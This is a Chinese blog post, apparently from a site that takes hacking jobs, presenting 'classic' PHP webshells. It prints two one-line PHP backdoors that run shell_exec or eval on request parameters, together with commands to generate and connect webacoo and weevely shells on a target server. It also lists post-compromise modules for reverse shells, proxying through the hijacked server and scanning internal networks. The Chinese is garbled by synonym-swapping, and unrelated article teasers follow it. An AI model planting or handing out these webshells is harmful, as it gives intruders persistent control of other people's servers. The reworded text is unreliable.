几种好用的经典webshell(php)

访客3年前关于黑客接单392

webshell就是以网页文件形式存在的一种下令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问php后门,获得一个下令执行环境,以到达控制网站服务器的目的。 

顾名思义,“web”的寄义是显然需要服务器开放web服务,“shell”的寄义是取得对服务器某种程度上操作权限。webshell经常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态剧本的形式泛起,也有人称之为网站的后门工具。


php经典一句话: 

<?php echo shell_exec($_GET[‘cmd‘]);?>


中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端,再用中国菜刀客户端(图形化界面)去毗邻服务器

 

webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:天生webshell,上传至目的服务器,再拿webacoo去毗邻该webshell,返回可以执行系统下令的shell
瑕玷:不能设置专属毗邻密码
天生webshell: webacoo -g -o a.php
毗邻webshell: webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理:天生webshell,上传至目的服务器,再拿weevely去毗邻该webshell,返回可以执行系统下令的shell
天生webshell:weevely generate 密码 a.php
毗邻webshell:weevely http://192.168.1.1/a.php 密码
特点:毗邻到目的服务器webshell后还可以挪用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

30多个治理模块举例:
1、执行系统下令、浏览文件系统
2、检查服务器常见设置错误
3、建立正向、反向TCP Shell毗邻
4、将目的服务器作为署理http服务器(肉鸡) ====>只需要在毗邻到的shell中输入net_proxy即可打开署理,此时会在内陆监听127.0.0.1:8080,浏览器设置为该署理后所有流量将走目的服务器
5、从目的计算机运行端口扫描,渗透内网


思源资源网:分类流动

1.阿里云: 本站现在使用的是阿里云主机,平安/可靠/稳固。点击领取2000米代金券、领会最新阿里云产物的种种优惠流动点击进入

相关文章

黑客帝国2+云播(黑客帝国在线播放高清2)

黑客帝国2+云播(黑客帝国在线播放高清2)

本文目录一览: 1、谁有黑客帝国2的在线观看网址 2、哪里能观看黑客帝国2 3、谁有黑客帝国2,加字幕要百度云的!谢谢 4、求 黑客帝国2:重装上阵 百度网盘免费资源链接,谢谢 5、网...

李泽珑携新专《娃娃机 警告》做客《听见大牌》

12月10日晚20:00,李泽珑将做客虎牙直播《听见大牌》。这次古灵精怪的她,将会带着新专辑《娃娃机 警告》和大家见面,期待本期李泽珑的精彩表现哦! 李泽珑是一位十分有个性和个人风格的新声代音乐...

SEO人员,为什么尽量少用zblog插件?

SEO人员,为什么尽量少用zblog插件?

假如你是一个下层站长,你必然有利用cms系统的履历,个中wp和zb是两个最常用的博客系统,而在中国,仍然有要害的SEO人员更喜欢利用zblog。 主要原因是:成立站点的本钱很低,足以满意中小型企业的需...

房产知识:有谁讲讲辞职后怎么领取公积金?

相信现在有很多的朋友们对于有谁讲讲辞职后怎么领取公积金?都想要了解吧,那么今天小编就来给大家针对有谁讲讲辞职后怎么领取公积金?进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦 大概有三种办法:1...

网络电视黑客(中国电脑黑客电视剧)

网络电视黑客(中国电脑黑客电视剧)

本文导读目录: 1、你知道吗?智能电视黑客攻击方式的四种 2、巴基斯坦电视台遭黑客入侵,黑客究竟是一种怎样的存在? 3、如何有效防范Win7旗舰版系统下黑客利用wifi入侵智能电视? 4、...

当事乘客评中国机长怎么说的 当事乘客是如何评价电影中国机长的

《中国机长》这一部累计票房暴涨,这部影片是真实事件改写而成,源于于上年四川航空3U8633紧急迫降解救整机旅客这一恶性事件。那麼当事人旅客是如何看待影片中国机长的呢?下边我产生详细介绍。 当事人旅客...